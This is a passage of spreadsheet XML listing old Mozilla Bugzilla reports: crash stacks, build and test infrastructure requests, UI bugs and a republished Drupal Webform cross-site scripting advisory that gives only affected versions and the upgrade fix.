| ||	mCanceled	0x00000000	unsigned int
| ||	mTransactionReplaced	0x00000000	unsigned int
| ||	mUploadStreamHasHeaders	0x00000000	unsigned int
| ||	mAuthRetryPending	0x00000000	unsigned int
| ||	mSuppressDefensiveAuth	0x00000000	unsigned int
| |\	mResuming	0x00000000	unsigned int
| \+	nsIRequestObserver	{...}	nsIRequestObserver
|+	mListenerContext	{...}	nsCOMPtr
|+	mEventQ	{mRawPtr=0x01062a38 {mRefCnt={mValue=0x0000001f }
_mOwningThread={mThread=0x003f5c80 } mEventQueue=0x01062af8 {name=0x00390c08
Thread event queue... queue={next=0x039effa0 prev=0x04387b38 }
monitor=0x01062b48 ...} ...} }	nsCOMPtr
|+	mStream	{mRawPtr=0x00000000 }	nsCOMPtr
|+	mAsyncStream	{mRawPtr=0x034dc330 {mPipe=0x034dc320
{mRefCnt={mValue=0x00000005 } _mOwningThread={mThread=0x003f5c80 }
mInput={mPipe=0x034dc320 mReaderRefCnt=0x00000004 mLogicalOffset={...} ...} ...}
mReaderRefCnt=0x00000004 mLogicalOffset={mValue=0x0000000000000000 } ...} }
nsCOMPtr
|+	mStreamOffset	{mValue=0x0000000000000000 }	nsTInt64
|+	mStreamLength	{mValue=0xffffffffffffffff }	nsTInt64
|	mSegSize	0x00000000	unsigned int
|	mSegCount	0x00000000	unsigned int
|	mStatus	0x00000000	unsigned int
|	mSuspendCount	0x00000000	unsigned int
|	mLoadFlags	0x00000000	unsigned int
|	mIsPending	0xcd 'Ã'	unsigned char
|	mWaiting	0x01 'â'	unsigned char
\	mCloseWhenDone	0x00	unsigned char</t>
  </si>
  <si>
    <t>CORE-402853</t>
  </si>
  <si>
    <t>linker warnings for libxul</t>
  </si>
  <si>
    <t>Saw these in the 3.0b1 build and bug 388663 comment #14 indicates when it started.</t>
  </si>
  <si>
    <t>TESTING-419826</t>
  </si>
  <si>
    <t>Make browser mochitests run on SeaMonkey</t>
  </si>
  <si>
    <t>I'm adding browser mochitests for suite/ code in bug 416233 - it would be nice to make the framework for those be able to run out of the box.
For locally running the tests I only needed two small changes which was 1) using the different chrome URL for SeaMonkey (we'll need to do some detection there) and 2) moving some Cc/Ci vars to a more global scope in the same file (as those aren't defined by default in SeaMonkey.
With those small changes we should be able to get the framework to run on one more application! :)</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG_GRAVEYARD-472407</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG_GRAVEYARD</t>
  </si>
  <si>
    <t>Room owner's presence not always hidden from user in webchat</t>
  </si>
  <si>
    <t>When a room monitor leaves a live chat while monitoring the user sees the message  has left the conversation.  The presence should be hidden on joining and parting to prevent users from seeing when a room monitor leaves.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-388873</t>
  </si>
  <si>
    <t>Re-image bm-xserv07 bm-xserv12</t>
  </si>
  <si>
    <t>These two machines have recently been freed up and are being repurposed for build machines. 
We'd like to reimage them before we start to use these so we know we have clean installs of OS and no lurking other surprise installed apps which might cause problems for builds.
I've confirmed offline there is nothing on these machines currently that needs to be saved so its ok to just blow away everything and install fresh...</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-515701</t>
  </si>
  <si>
    <t>re-configure winxp talos boxes post re-image</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-387450</t>
  </si>
  <si>
    <t>Installer: GRE</t>
  </si>
  <si>
    <t>remove xpinstall/wizard from cvs</t>
  </si>
  <si>
    <t>After removing (most of) xpinstall/packager in bug 386903 we also should kill xpinstall/wizard so that old installers are really a thing of the past :)</t>
  </si>
  <si>
    <t>CORE-296163</t>
  </si>
  <si>
    <t>Auto-detect proxy settings (proxy configuration over a URL PAC) doesn't work if PAC file contains non-ASCII text</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b2) Gecko/20050518
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b2) Gecko/20050530
The proxy configuration over a URL like http://proxyconf doesn't work.
Sites with access over the proxy could not be reach. 
I found the problem with
Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b2) Gecko/20050518
and reproduce it with
Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b2) Gecko/20050530
There are no problems with the release version of Mozilla 1.8b.
Reproducible: Always
Steps to Reproduce:
Use a proxyserver to access sites and use a configuration scrit to setup the
browser.</t>
  </si>
  <si>
    <t>bugzilla.alex</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-464777</t>
  </si>
  <si>
    <t>Security group configuration for SUMO is borked</t>
  </si>
  <si>
    <t>Via reed:
[% ELSIF product.name == Websites OR product.name == Mozilla Developer Center OR product.name == Sumo %]
[% sec_bit = 52 %] [%# websites-security %]
Sumo should read support.mozilla.com.
This is on the bz repository on dm-bugstage01.
template/en/default/bug/create/create.html.tmpl and template/en/default/bug/create/create-guided.html.tmpl both need editing according to reed.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-171091</t>
  </si>
  <si>
    <t>CVS checkin access request for Rick.Ju@sun.com</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.0.0) Gecko/20020618
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.0.0) Gecko/20020618
I'd like to apply for my cvs checkin access. My interests are mainly in layout
and calendar. 
Contributions:
 bug 92980:   Fixed. r=jkeiser sr=kin
        guess out IE6's algorithm and provide patches.
 bug 166750:  Checked in. r=jkeiser sr=kin
        p1 critical crasher. provide patch
 bug 50998: Fixed. r=biesi  sr=rbs
        p2 normal.  provide patches for qt/mac/mac/photon/beos platforms
 bug 170225: Fixed. r=jkeiser sr=bryner
        p2 regression crasher. provide patches.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>Rick.Ju</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-155976</t>
  </si>
  <si>
    <t>moz.zope.org - 502 proxy error</t>
  </si>
  <si>
    <t>I am getting a 502 proxy error whenever I go to moz.zope.org.  The site was
working earlier today.  It isn't browser-specific platform-specific or
OS-specific.  It is sub-domain-specific since zope.org works as well as
dev.zope.org.  The exact message is:
502 Proxy Error
Proxy Error
The proxy server received an invalid response from an upstream server.
The proxy server could not handle the request GET /.
Reason: Could not connect to remote machine: Connection refused</t>
  </si>
  <si>
    <t>CORE-391055</t>
  </si>
  <si>
    <t>Another crash due to too much recursion in [@ XPCWrappedNative::GetWrappedNativeOfJSObject]</t>
  </si>
  <si>
    <t>Created attachment 275411
testcase (crashes Firefox when loaded)
Symptoms the same as bug 390626 (crash due to too much recursion in XPCWrappedNative::GetWrappedNativeOfJSObject) but different testcase (no __proto__ setting here).</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-460329</t>
  </si>
  <si>
    <t>Push fennec A1 to ftp</t>
  </si>
  <si>
    <t>http://people.mozilla.org/~blassey/m9_stage/
http://people.mozilla.org/~blassey/mozilla-fennec.install</t>
  </si>
  <si>
    <t>CALENDAR-227730</t>
  </si>
  <si>
    <t>Blocking error when starting Mozilla: can't SendMsg[Exception... Not enough arguments [nsIMsgCompose.SendMsg]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux ppc en-US rv:1.6a) Gecko/20031101
Build Identifier: http://ftp.mozilla.org/pub/mozilla/nightly/latest/mozilla-source.tar.bz2
When I start Mozilla an error window opens with the following message:
can't SendMsg[Exception... Not enough arguments [nsIMsgCompose.SendMsg]
nsresult: 0x80570001 (NS_ERROR_XPC_NOT_ENOUGH_ARGS) location: JS frame ::
chrome://calendar/content/calendarMail.js :: sendEmail :: line 425 data: no]
There is an OK button but it is unresponsive. I can't do anything else (there
is no browser window).
Reproducible: Always
Steps to Reproduce:
1. Start Mozilla.
Actual Results:  
I get an error with no possibility to cancel it.
Expected Results:  
Mozilla should have been started normally. In particular the error in Calendar
should have no effect on the browser.
This is a nightly version I compiled in the morning.</t>
  </si>
  <si>
    <t>vincent-moz</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-368176</t>
  </si>
  <si>
    <t>Translations</t>
  </si>
  <si>
    <t>Search bar - Searching in Le Jargon FR</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.7) Gecko/20060911 Camino/1.0.3 (MultiLang)
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.7) Gecko/20060911 Camino/1.0.3 (MultiLang)
Hi
I think this bug will only concerns the french localization of Camino because. In the seach bar (top right corner) theire is a possibility of searching in Le Jargon FR.
Unfortunatly Le Jargon FR have changed its URL. It was http://www.linux-france.org/prj/jargonf/ and it moved to http://jargonf.discu.org/ .
In order to allow searchin in the new website the search code sould be changed from:
http://www.linux-france.org/prj/jargonf/general/cherche.php?req=
to
http://jargonf.discu.org/index.php/Special:Search?search=
Fortunatly the new website works with Wikimedia so it should looks like Wikipedia search.
Reproducible: Always
Steps to Reproduce:
1.Select Le Jargon FR in search bar
2.Search someting
3.Compare with http://jargonf.discu.org</t>
  </si>
  <si>
    <t>nicolas.forgeard-grignon</t>
  </si>
  <si>
    <t>TESTING-419339</t>
  </si>
  <si>
    <t>Mochitests should fail on exceeding an Rlk-style leak threshold</t>
  </si>
  <si>
    <t>Created attachment 305386
Short and sweet will need tinderbox-side changes to actually check leak thresholds
We already sorta did this in bug 397724 but there are too many changes going on at once on the tinderboxen set up on the Testing tree to reasonably work with this so we need a lighter-weight solution.</t>
  </si>
  <si>
    <t>CORE-376981</t>
  </si>
  <si>
    <t>[FIX]problem with the find toolbar layout with certain frameset pages (matching text is not visible)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X en-US rv:1.9a3) Gecko/20070322 Firefox/2.0 GranParadiso/3.0a3
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X en-US rv:1.9a3) Gecko/20070322 Firefox/2.0 GranParadiso/3.0a3
On the given URL the find toolbar comes over the page. So the matching text is not visible because hidden behind the toolbar.
Reproducible: Always
Steps to Reproduce:
1. Go to the URL
2. Click on To-do List link on the left frame
3. Hit Apple+F to open the find toolbar
4. Type a search (for example date)
Actual Results:  
The text is well highlighted but is behind the find toolbar. Even the scrollbar is behind the toolbar.
Expected Results:  
The document should resize automatically so that nothing can be behind the toolbar.
If you reload the page using the Reload button (with the find toolbar already open) the page is rendered as expected (nothing is under the toolbar). But if you close the toolbar now there is a white space down the window (this place should be now part of the page rendering area).
The frameset used on this place has something special I guess to be resizable (maybe a javascript I didn't look closely)...</t>
  </si>
  <si>
    <t>wmoussel</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-496182</t>
  </si>
  <si>
    <t>SA-CONTRIB-2009-032 - Webform - Cross-site scripting</t>
  </si>
  <si>
    <t>* Advisory ID: DRUPAL-SA-CONTRIB-2009-032
 * Project: Webform (third-party module)
 * Versions: 5.x 6.x
 * Date: 2009-June-03
 * Security risk: Moderately critical
 * Exploitable from: Remote
 * Vulnerability: Cross-site scripting
-------- DESCRIPTION ---------------------------------------------------------
The Webform module provides a node type which is typically used to enable
site visitors to fill in questionnaires contact or request/registration
forms surveys polls or other forms on a Drupal site. When displaying the
results of Webform submissions the module does not properly filter user
entered data leading to a cross-site scripting [1] (XSS) vulnerability on
sites with a specific configuration of input formats that would normally be
safe. Such an attack carried out against a sufficiently privileged user may
lead a malicious user to gain administrator access to the site.
-------- VERSIONS AFFECTED ---------------------------------------------------
 * Versions of Webform for Drupal 5.x prior to 5.x-2.7
 * Versions of Webform for Drupal 6.x prior to 6.x-2.7
Drupal core is not affected. If you do not use the contributed Webform
module there is nothing you need to do.
-------- SOLUTION ------------------------------------------------------------
Install the latest version:
 * If you use Webform for Drupal 5.x upgrade to Webform 5.x-2.7 [2].
 * If you use Webform for Drupal 6.x upgrade to Webform 6.x-2.7 [3].
This affects SFx and QMO
See also the Webform project page [4].
-------- REPORTED BY ---------------------------------------------------------
David Rothstein [5]
-------- FIXED BY ------------------------------------------------------------
Nathan Haug (quicksketch [6]) and David Rothstein [7] of the Drupal Security
Team [8]
-------- CONTACT -------------------------------------------------------------
The security contact for Drupal can be reached at security at drupal.org or
via the form at http://drupal.org/contact.
[1] http://en.wikipedia.org/wiki/Cross-site_scripting
[2] http://drupal.org/node/481260
[3] http://drupal.org/node/481258
[4] http://drupal.org/project/webform
[5] http://drupal.org/user/124982
[6] http://drupal.org/user/35821
[7] http://drupal.org/user/124982
[8] http://drupal.org/security-team
_______________________________________________
Security-news mailing list
Security-news@drupal.org
http://lists.drupal.org/listinfo/security-news</t>
  </si>
  <si>
    <t>EXTEND_FIREFOX_GRAVEYARD-399288</t>
  </si>
  <si>
    <t>correct winner announcement date to match rules comply with laws of physics</t>
  </si>
  <si>
    <t>Created attachment 284276
fix winner announcement date
Contest winners shouldn't be announced before the contest has started.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-121534</t>
  </si>
  <si>
    <t>columbiahouse.com - New VeriSign root certificate neded?</t>
  </si>
  <si>
    <t>Some sites like https://www.columbiahouse.com/ have a certificate that claims
to be signed by VeriSign but Mozilla claims not to recognize the certificate
authority.  Does Mozilla need to get a new root certificate from VeriSign or
do these sites have buggy certificates?</t>
  </si>
  <si>
    <t>CORE-330059</t>
  </si>
  <si>
    <t>Text Inside Child  Elements Does Not Render</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Text inside an anchor element which is a child of a text element does not render. This also applies to anchors nested inside  elements.
For example:
This renders but this does not.
Reproducible: Always
Steps to Reproduce:
1. Try to put text inside an anchor element as above.
2. Display file.
3. Sigh.
Actual Results:  
Text inside anchor does not render.
Expected Results:  
Text inside anchor should render as a link.</t>
  </si>
  <si>
    <t>CORE-515844</t>
  </si>
  <si>
    <t>TM: trace-test.py: option to run test case in debugger</t>
  </si>
  <si>
    <t>Created attachment 399927
Patch
By popular demand. To run the test case 'bug464403.js' in gdb:
    python ../trace-test/trace-test.py shell/js bug464403 -d
Any substring of 'bug464403.js' that is not a substring of any other test name will also work.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-459632</t>
  </si>
  <si>
    <t>New SSH Key for azer koculu's SVN account</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3
Build Identifier: 
Hi
I've lost my ssh key that was registered to SVN account of getfirebug.com. Could you add my new&amp;permanent SSH key please? I've attached id_rsa.pub file.
Thank you very much
Azer 
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>azer</t>
  </si>
  <si>
    <t>DIRECTORY-324525</t>
  </si>
  <si>
    <t>Memory error in ber_get_stringal/ber_bvfree</t>
  </si>
  <si>
    <t>If the malloc is done to allocate the *bv but then an lber error is encountered while doing the ber_skip_tag (due to a bad or malicious client) the bv-&gt;bv_val is set to a random value.  If you then try to use ber_bvfree to free the bv it may call free on this uninitialized value and badness ensues.  I think the proper fix is for ber_get_stringal to set (*bv)-&gt;bv_val to NULL and (*bv)-&gt;bv_len to 0 just after the malloc.</t>
  </si>
  <si>
    <t>richm</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-147174</t>
  </si>
  <si>
    <t>nodeName column header in DOM inspector is confusing</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.0rc3)
Gecko/20020523
BuildID:    20020523
In DOM inspector Tab Object &gt; Object - DOM Node we have nodeName and
nodeValue as column headers but IMHO nodeName is quite confusing.  I think
Node Attribute Attribute or Attribute name are more appropriate but by
nodeName I would think of the DOM property nodeName which gives the name of
element.
Similarly Attribute Value or Value are more appropriate than nodeValue.
Reproducible: Always</t>
  </si>
  <si>
    <t>lapsap7+mz</t>
  </si>
  <si>
    <t>NSS-387621</t>
  </si>
  <si>
    <t>certutil's random noise generator isn't very efficient</t>
  </si>
  <si>
    <t>When generating a new private key in certutil it asks the user to enter characters on the keyboard to initialise the random seed. It looks to me like there is an error in how this is coded however.
Look at the code the buffer is initialised to 60 characters. However only the first character is ever written to so the randomness is continually initialised by just one random character. Also rather than initialising with the full length of the buffer sizeof is used which merely returns the length of the buffer's pointer.
I'm a little confused as to why PK11_RandomUpdate is called inside the while loop too. Is there some significance to this or would it just be more sensible to fill the buffer with characters once and then call it with them all?</t>
  </si>
  <si>
    <t>CORE-186953</t>
  </si>
  <si>
    <t>remove maxElementSize::height calculation</t>
  </si>
  <si>
    <t>Right now the maxElementSize member variable of nsHTMLReflowMetrics is an
nsSize with a width and a height.  We fill in the height using roughly the same
algorithm as the width.  The width has a useful purpose:  it's the smallest the
width of an element can go without overflow or at least it's supposed to be. 
The height has no such useful meaning: it doesn't even take into account such
basic characteristics of flow layouts such as forced line breaks.
Fortunately nobody uses the height.  Well almost.  nsListBoxFrame does but I
could replace its use with a 6-line loop.
I'm attaching a large patch to convert the |nsSize* maxElementSize| to
|PRPackedBool mComputeMEW| (in the old code you requested computation of the MES
by making the pointer non-null) and |nscoord mMaxElementWidth|.
The only substantive changes are in nsListControlFrame and nsBoxToBlockAdaptor.
 I'm not sure yet that the nsBoxToBlockAdaptor changes are correct (and I'd also
like to look at the nsBoxFrame nsBoxLayoutState and ns{Image/Leaf}BoxFrame
changes a little more closely.
(This is one tiny step towards pulling the min/max width computation out of
|Reflow|.)</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-516155</t>
  </si>
  <si>
    <t>[l10n: et] updated main.lang file for www.mozilla.com</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.1 et rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Build Identifier: 
Reproducible: Always</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-523114</t>
  </si>
  <si>
    <t>reindex crash [@ nsImapMailFolder::ParseAdoptedMsgLine(char const* unsigned int int nsIImapUrl*)]</t>
  </si>
  <si>
    <t>from crash-stats (not my crash)
reindex crash [@ nsImapMailFolder::ParseAdoptedMsgLine(char const* unsigned int int nsIImapUrl*)]
top of stack is a topcrash for 3.0bpre - however there may be at least two different crashes here based on cursory look at stacks so we need to sort this out. marking blocking? just for the QA bit. I've dropped this into backend rather than imap because reindex is mentioned in comments
nsImapMailFolder::ParseAdoptedMsgLine(char const* unsigned int int nsIImapUrl*) is not new - goes back to at least 3.0b1
bp-eca62347-1ff4-4b92-bc03-bbb712091014
Rebuild index in imap inbox. I've had a message index problem today - one particular entry in the inbox list shows a completely different message when I click on the list item. I did two index rebuilds to try and correct it. The second one caused this crash.
Frame	Module	Signature [Expand]	Source
0	thunderbird-bin	nsImapMailFolder::ParseAdoptedMsgLine	mailnews/imap/src/nsImapMailFolder.cpp:4410
1	libxpcom_core.dylib	NS_InvokeByIndex_P	xpcom/reflect/xptcall/src/md/unix/xptcinvoke_unixish_x86.cpp:179
2	libxpcom_core.dylib	nsProxyObjectCallInfo::Run	xpcom/proxy/src/nsProxyEvent.cpp:181
3	libxpcom_core.dylib	nsThread::ProcessNextEvent	xpcom/threads/nsThread.cpp:521
4	libxpcom_core.dylib	NS_ProcessNextEvent_P	nsThreadUtils.cpp:227
5	thunderbird-bin	nsXULWindow::ShowModal	
6	thunderbird-bin	nsWindowWatcher::OpenWindowJSInternal	embedding/components/windowwatcher/src/nsWindowWatcher.cpp:992
7	thunderbird-bin	nsWindowWatcher::OpenWindowJS	embedding/components/windowwatcher/src/nsWindowWatcher.cpp:487
8	thunderbird-bin	nsGlobalWindow::OpenInternal	dom/src/base/nsGlobalWindow.cpp:7364
9	thunderbird-bin	nsGlobalWindow::OpenDialog	dom/src/base/nsGlobalWindow.cpp:5157
10	libxpcom_core.dylib	NS_InvokeByIndex_P	xpcom/reflect/xptcall/src/md/unix/xptcinvoke_unixish_x86.cpp:179
11	thunderbird-bin	XPCWrappedNative::CallMethod	js/src/xpconnect/src/xpcwrappednative.cpp:2456
12	thunderbird-bin	XPC_WN_CallMethod	js/src/xpconnect/src/xpcwrappednativejsops.cpp:1590
13	libmozjs.dylib	js_Invoke	js/src/jsinterp.cpp:1386
14	libmozjs.dylib	js_Interpret	js/src/jsinterp.cpp:5179
15	libmozjs.dylib	js_Invoke	js/src/jsinterp.cpp:1394
16	libmozjs.dylib	js_InternalInvoke	js/src/jsinterp.cpp:1447
17	libmozjs.dylib	JS_CallFunctionValue	js/src/jsapi.cpp:5187
18	thunderbird-bin	nsJSContext::CallEventHandler	dom/src/base/nsJSEnvironment.cpp:2085
19	thunderbird-bin	nsJSEventListener::HandleEvent	dom/src/events/nsJSEventListener.cpp:247
20	thunderbird-bin	nsEventListenerManager::HandleEventSubType	content/events/src/nsEventListenerManager.cpp:1098
21	thunderbird-bin	nsEventListenerManager::HandleEvent	content/events/src/nsEventListenerManager.cpp:1206
22	thunderbird-bin	nsEventTargetChainItem::HandleEvent	content/events/src/nsEventDispatcher.cpp:236 
a different crash
bp-726aadf5-1201-43f2-a977-0d5b72090302
0	thunderbird.exe	nsMIMEHeaderParamImpl::GetParameterInternal	 netwerk/mime/src/nsMIMEHeaderParamImpl.cpp:210
1	thunderbird.exe	MimeHeaders_get_parameter	mailnews/mime/src/mimehdrs.cpp:492
2	thunderbird.exe	MimeMultipart_parse_line	mailnews/mime/src/mimemult.cpp:376
3	thunderbird.exe	convert_and_send_buffer	mailnews/mime/src/mimebuf.cpp:184
4	thunderbird.exe	mime_LineBuffer	mailnews/mime/src/mimebuf.cpp:272
5	thunderbird.exe	MimeObject_parse_buffer	mailnews/mime/src/mimeobj.cpp:275
6	thunderbird.exe	MimeMessage_parse_line	mailnews/mime/src/mimemsg.cpp:232
7	thunderbird.exe	convert_and_send_buffer	mailnews/mime/src/mimebuf.cpp:184
8	thunderbird.exe	mime_LineBuffer	mailnews/mime/src/mimebuf.cpp:272
9	thunderbird.exe	MimeObject_parse_buffer	mailnews/mime/src/mimeobj.cpp:275
10	thunderbird.exe	mime_display_stream_write	mailnews/mime/src/mimemoz2.cpp:946
11	thunderbird.exe	nsStreamConverter::OnDataAvailable	mailnews/mime/src/nsStreamConverter.cpp:938
12	thunderbird.exe	nsImapCacheStreamListener::OnDataAvailable	mailnews/imap/src/nsImapProtocol.cpp:8130
13	thunderbird.exe	nsInputStreamPump::OnStateTransfer	netwerk/base/src/nsInputStreamPump.cpp:508
14	thunderbird.exe	nsInputStreamPump::OnInputStreamReady	netwerk/base/src/nsInputStreamPump.cpp:398
15	xpcom_core.dll	nsOutputStreamReadyEvent::Run	xpcom/io/nsStreamUtils.cpp:111</t>
  </si>
  <si>
    <t>TOOLKIT-359660</t>
  </si>
  <si>
    <t>reference to undefined property evt.canBubble</t>
  </si>
  <si>
    <t>Warning: reference to undefined property evt.canBubble
Source File: chrome://global/content/findBar.js
Line: 330
mxr-test says this creature doesn't exist.</t>
  </si>
  <si>
    <t>SEAMONKEY-162308</t>
  </si>
  <si>
    <t>_IMPL_NS_LAYOUT unused</t>
  </si>
  <si>
    <t>_IMPL_NS_LAYOUT is only defined never used.</t>
  </si>
  <si>
    <t>CORE-236641</t>
  </si>
  <si>
    <t>remove all with large permissions list hangs Mozilla</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6) Gecko/20040224
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6) Gecko/20040224
I used the feature to always ask me before allowing a cookie for a long time.
Thus a lot of sites ended up in my permission list for cookies. I'm not exactly
sure how many sites were their but I do recal the text file cookies.txt 
under .mozilla to be 45KB.
Recently I changed my mind and tried to remove all the cookie permission
settings by clicking Remove all sites under the Cookie Sites tab in the
Cookie Manager.
That caused mozilla to instanstly hang. Had to manually kill it. I manually
removed coookies.txt under .mozilla to remove the permissions.
Reproducible: Always
Steps to Reproduce:
1. Set cookie permissions for a lot of sites
2. Click Remove all sites under the Cookie sites tab in the cookie manager
Actual Results:  
Mozilla hanged. Had to manually kill application.
Expected Results:  
Removed all the sites from Cookie sites tab in the cookie manager</t>
  </si>
  <si>
    <t>tomek32</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-335319</t>
  </si>
  <si>
    <t>pre-process out debug.js' license header</t>
  </si>
  <si>
    <t>This file is included in others some components and mostly at the bottom so having the license header in the resultant including files is pretty useless.</t>
  </si>
  <si>
    <t>CORE-504462</t>
  </si>
  <si>
    <t>Merge tamarin's CodeAlloc into tracemonkey</t>
  </si>
  <si>
    <t>Created attachment 388832
wip
Port the tamarin bug 490380. And any dependencies I discover for it.
(Currently needs to integrate I've learned the patch in 457960 as well. Oops.)</t>
  </si>
  <si>
    <t>BUGZILLA-313941</t>
  </si>
  <si>
    <t>t/008filter.t should accept TRY/CATCH template directives</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win 9x 4.90 en-US rv:1.7.12) Gecko/20050915 Firefox/1.0.7
Build Identifier: 2.20 2.21.+
Test does not aware of TRY and CATCH TT2 directives. So it prevents me from using them in my template customization.
Reproducible: Always
Steps to Reproduce:
1. Create template like this:
 [% TRY %]
   [% PROCESS $dynfilename %]
 [% CATCH %]
   [% PROCESS some/default/template.html.tmpl %]
 [% END%]
2. run ./runtests.pl 008 --verbose
3. grep for not ok
Actual Results:  
not ok 267 - (en/default) template/en/default/some/template.html.tmpl has unfiltered directives:
#   56: TRY
#   57: CATCH
#   58: FINALY
# --ERROR
Expected Results:  
ok 267 - (en/default) some/template.html.tmpl is filter-safe</t>
  </si>
  <si>
    <t>u197037</t>
  </si>
  <si>
    <t>FIREFOX-335441</t>
  </si>
  <si>
    <t>Change tiny drop-down in browser search box into a button/drop-down combo to the right of the search box</t>
  </si>
  <si>
    <t>CORE-360013</t>
  </si>
  <si>
    <t>use dirty region to draw</t>
  </si>
  <si>
    <t>rather than repainting the whole area we should draw sections either using a region or by just drawing each rect one at a time...</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-87394</t>
  </si>
  <si>
    <t>ChatZilla doesn't support HTTP CONNECT proxy</t>
  </si>
  <si>
    <t>chatzilla doesn't have support for http proxy althought it 
is trivial using the HTTP/1.1 method CONNECT.
New irc clients now support http proxy (like xchat version 1.7.x)</t>
  </si>
  <si>
    <t>miguelanxotero</t>
  </si>
  <si>
    <t>CORE-380475</t>
  </si>
  <si>
    <t>[FIX]Make getting URIs from principals a little faster</t>
  </si>
  <si>
    <t>Created attachment 264573
Proposed patch
Bug 339822 missed the main spot where we set URIs on principals.  And in fact GetURI _is_ on one of the security check critical paths...
The patch implements some of the things that bug talks about as well as hitting the remaining points where mCodebase is modified.</t>
  </si>
  <si>
    <t>CORE-391184</t>
  </si>
  <si>
    <t>Firefox crashed [@ _get_bitmap_surface] div zero in _cairo_malloc_ab macro</t>
  </si>
  <si>
    <t>Load Tp2 test page
http://localhost/page_load_test/pages/www.terra.com.br/www.terra.com.br/cap   a/index.html
Firefox crashed.
t@null (l@1) terminated by signal FPE (integer divide by zero)
Current function is _get_bitmap_surface
  758               data = _cairo_malloc_ab (height stride)
(dbx) print stride
stride = 0
(dbx) print height
height = 0
(dbx) where                                                                  
=&gt;[1] _get_bitmap_surface(bitmap = 0x94b0534 own_buffer = 0 font_options = 0x988161c surface = 0x8041ec8) line 758 in cairo-ft-font.c
  [2] _render_glyph_bitmap(face = 0x94b02d0 font_options = 0x988161c surface = 0x8041ec8) line 1105 in cairo-ft-font.c
  [3] _cairo_ft_scaled_glyph_init(abstract_font = 0x9881518 scaled_glyph = 0x94b0c88 info = 3) line 2018 in cairo-ft-font.c
(dbx) frame 2 
Current function is _render_glyph_bitmap
 1105       status = _get_bitmap_surface (
(dbx) list -10
 1095        * the opportunity to convert such to
 1096        * bitmap. FT_GLYPH_FORMAT_COMPOSITE will not be encountered since
 1097        * we avoid the FT_LOAD_NO_RECURSE flag.
 1098        */
 1099       error = FT_Render_Glyph (glyphslot FT_RENDER_MODE_NORMAL)
 1100       if (error) {
 1101           _cairo_error (CAIRO_STATUS_NO_MEMORY)
 1102           return CAIRO_STATUS_NO_MEMORY
 1103       }
 1104
(dbx) print *glyphslot
*glyphslot = {
    library           = 0x84a0278
    face              = 0x94b02d0
    next              = (nil)
    reserved          = 0
    generic           = {
        data      = (nil)
        finalizer = (nil)
    }
    metrics           = {
        width        = 0
        height       = 0
        horiBearingX = 0
        horiBearingY = 0
        horiAdvance  = 192
        vertBearingX = 0
        vertBearingY = 0
        vertAdvance  = 0
    }
    linearHoriAdvance = 0
    linearVertAdvance = 0
    advance           = {
        x = 192
        y = 0
    }
    format            = FT_GLYPH_FORMAT_BITMAP
    bitmap            = {
        rows         = 0
        width        = 0
        pitch        = 0
        buffer       = (nil)
        num_grays    = 1
        pixel_mode   = '\001'
        palette_mode = '\0'
        palette      = (nil)
    }
    bitmap_left       = 0
    bitmap_top        = 0
    outline           = {
        n_contours = 0
        n_points   = 0
        points     = (nil)
        tags       = (nil)
        contours   = (nil)
        flags      = 0
    }
    num_subglyphs     = 0
    subglyphs         = (nil)
    control_data      = (nil)
    control_len       = 0
    lsb_delta         = 0
    rsb_delta         = 0
    other             = (nil)
    internal          = 0x9601128
}</t>
  </si>
  <si>
    <t>MOZILLA.ORG-367193</t>
